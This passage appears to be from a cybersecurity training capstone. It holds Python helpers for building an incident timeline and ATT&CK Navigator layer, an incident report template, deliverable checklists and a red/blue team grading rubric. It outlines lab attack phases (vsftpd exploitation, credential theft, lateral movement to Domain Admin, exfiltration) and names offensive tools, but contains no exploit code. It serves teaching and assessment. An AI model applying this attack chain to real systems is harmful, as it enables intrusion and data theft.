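    rows += [f"| {ts:%Y-%m-%d %H:%M} | {ev} | {system} | {act} |" for ts, ev, system, act, _ in events]
    return "\n".join(rows)

def navigator_layer(events, name="Operation Serpent's Shadow"):
    """ATT&CK Navigator layer dict; the version numbers are an assumption for this example."""
    seen = {}
    for _, ev, _, _, tech in events:
        if tech:
            seen.setdefault(tech, []).append(ev)
    return {"name": name, "domain": "enterprise-attack",
            "versions": {"attack": "14", "navigator": "4.9.1", "layer": "4.5"},
            "techniques": [{"techniqueID": t, "score": len(evs), "color": "#ff6666",
                            "comment": "; ".join(evs)} for t, evs in sorted(seen.items())]}

if __name__ == "__main__":
    timeline = build_timeline()
    print(render_table(timeline))
    print(json.dumps(navigator_layer(timeline), indent=2))
```

Point the three parsers at real exports (eve.json lines, `zeek-cut ts id.orig_h id.orig_p id.resp_h id.resp_p proto` output, and a JSON export of `Get-WinEvent` results) to build the real timeline; the Navigator JSON can be saved as the Phase 5 layer file deliverable.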
**Report Structure** (Use `LAB_REPORT_TEMPLATE.md` as base):

```markdown
# Incident Response Report: Operation Serpent's Shadow

## Security Incident #2026-001

**Classification**: CONFIDENTIAL
**Date**: [Current Date]
**Incident Handler**: [Your Name]
**Severity**: CRITICAL

---

## Executive Summary (1 page)
- **What Happened**: Brief overview of the incident
- **Impact**: Systems compromised, data exfiltrated
- **Root Cause**: Unpatched vsftpd vulnerability on legacy server
- **Remediation Status**: All threats eradicated, systems hardened
- **Recommendation**: Decommission FILE01, implement vulnerability management program

---

## Incident Timeline (2-3 pages)

| Timestamp | Event | System | Action |
|-----------|-------|--------|--------|
| 2026-02-10 14:23 | Initial scan detected | FILE01 | Suricata alert fired |
| 2026-02-10 14:45 | vsftpd exploit successful | FILE01 | Attacker gained shell |
| ... | ... | ... | ... |

---

## Technical Analysis (5-7 pages)

### Attack Chain
[Detailed walkthrough of each attack phase]

### Network Forensics
[PCAP analysis findings]

### Host Forensics
[Autopsy/Volatility findings]

### MITRE ATT&CK Mapping
[Table of techniques used]

---

## Indicators of Compromise (1 page)
[Complete IOC list]

---

## Response Actions (2-3 pages)

### Containment
[What was done to stop the attack]

### Eradication
[How threats were removed]

### Recovery
[How systems were restored]

---

## Lessons Learned (2 pages)

### What Went Well
- IDS detected initial scanning activity
- Log retention allowed full forensic analysis

### What Could Be Improved
- Delayed response to initial alerts (simulated)
- Legacy system not in patch management program
- No EDR on endpoints

### Recommendations
1. Implement 24/7 SOC monitoring
2. Deploy EDR across all endpoints
3. Decommission Metasploitable 2 (FILE01)
4. Conduct quarterly red team exercises
5. Implement tiered admin model

---

## Appendices
- Appendix A: Complete IOC List
- Appendix B: MITRE ATT&CK Navigator JSON
- Appendix C: Network Topology Diagram
- Appendix D: Forensic Evidence Inventory
```

**Deliverables**:
- [ ] Final IR report (PDF, 15-20 pages)
- [ ] Executive briefing (PowerPoint, 5-7 slides)
- [ ] Complete evidence package (ZIP archive)
- [ ] Post-incident review presentation

**Assessment Criteria** (15pts):
- Report professionalism and completeness (7pts)
- Technical accuracy (5pts)
- Actionable recommendations (3pts)

---

## Final Deliverables Checklist

### Red Team Package (50 Points)
- [ ] Attack command logs (`script` output)
- [ ] Screenshots (minimum 15)
- [ ] Red Team report (PDF)
- [ ] MITRE ATT&CK Navigator JSON
- [ ] IOC list (CSV)
- [ ] Exfiltrated data samples

### Blue Team Package (50 Points)
- [ ] Investigation logs
- [ ] Forensic images (disk + memory)
- [ ] PCAP files with annotations
- [ ] Incident Response report (PDF)
- [ ] Executive briefing (PPTX)
- [ ] Remediation documentation
- [ ] Dashboard integration (screenshots)

### Submission Format

Create ZIP archive: `CAPSTONE_YourName_OperationSerpentsShadow.zip`

```
CAPSTONE_YourName_OperationSerpentsShadow/
├── 01_Red_Team/
│   ├── logs/
│   ├── screenshots/
│   ├── loot/
│   ├── exfil/
│   ├── RedTeam_Report.pdf
│   └── MITRE_ATT&CK_Layer.json
├── 02_Blue_Team/
│   ├── forensics/
│   ├── pcaps/
│   ├── logs/
│   ├── IR_Report.pdf
│   ├── Executive_Briefing.pptx
│   └── Remediation_Plan.md
└── README.md (submission summary)
```

---

## Assessment Rubric

### Red Team Assessment (100 Points)

| Phase | Criteria | Points |
|-------|----------|--------|
| Phase 1: Recon | Service enumeration completeness | 10 |
| Phase 2: Initial Access | Successful exploitation | 15 |
| Phase 3: Credential Access | Multiple credential sources | 15 |
| Phase 4: Lateral Movement | Domain system compromise | 20 |
| Phase 5: Privilege Escalation | Domain Admin achieved | 20 |
| Phase 6: Exfiltration | Data extraction success | 10 |
| Phase 7: Reporting | Documentation quality | 10 |

### Blue Team Assessment (100 Points)

| Phase | Criteria | Points |
|-------|----------|--------|
| Phase 1: Detection | Alert triage accuracy | 15 |
| Phase 2: Network Forensics | PCAP analysis quality | 15 |
| Phase 3: Host Forensics | Disk/memory analysis | 20 |
| Phase 4: Incident Response | NIST PICERL execution | 20 |
| Phase 5: Threat Intelligence | MITRE ATT&CK mapping | 15 |
| Phase 6: Final Report | Professional documentation | 15 |

### Total: 200 Points

**Grading Scale**:
- 180-200: Exceptional (A)
- 160-179: Excellent (B)
- 140-159: Good (C)
- Below 140: Needs Improvement (Resubmit)

---

## Additional Resources

### Recommended Reading
- MITRE ATT&CK Framework: https://attack.mitre.org
- NIST SP 800-61r2 (Incident Response Guide)
- SANS Incident Response Poster
- Red Team Field Manual (RTFM)
- Blue Team Field Manual (BTFM)

### Tools Reference
- **Red Team**: Metasploit, Impacket, Mimikatz, BloodHound, CrackMapExec
- **Blue Team**: Volatility 3, Autopsy, Wireshark, Zeek, Suricata, KQL

### Dashboard Integration
- Export MITRE coverage: `dashboard/src/data/live/mitre_coverage.json`
- Update threat feed: `dashboard/src/data/live/threat_feed.json`
- Timeline visualization: Use `Recharts` LineChart component

---

## Post-Capstone Next Steps

After completing this capstone:

1. **Rebuild Lab Environment**: Reset all VMs to clean state
2. **Apply Hardening**: Implement your own remediation recommendations
3. **Re-Attack**: Attempt the same attack chain - what changed?
4. **Advanced Scenarios**: Try different attack paths (web app → AD, phishing simulation)
5. **Contribute to Dashboard**: Add real detection logic to React components

---

## Academic Integrity Statement

This capstone represents your own work and understanding of offensive and defensive security operations.
You may use:
- Official tool documentation
- MITRE ATT&CK knowledge base
- Course module materials (MOD0-MOD8)

You may NOT:
- Copy attack scripts without understanding them
- Use automated red team frameworks (Cobalt Strike, Covenant) - manual techniques only
- Plagiarize reports from online sources

**Authorized Use Only**: These techniques are for educational purposes in a controlled lab environment. Unauthorized use against systems you do not own or have explicit permission to test is illegal.

---

## Contact & Support

For technical issues:
- Review module materials (MOD0-MOD8)
- Check `LAB_REPORT_TEMPLATE.md` for report formatting
- Consult `ASSESSMENT_RUBRICS.md` for grading criteria

**Good luck, and remember**: "Order from Chaos" 🐍

---

**END OF CAPSTONE PROJECT**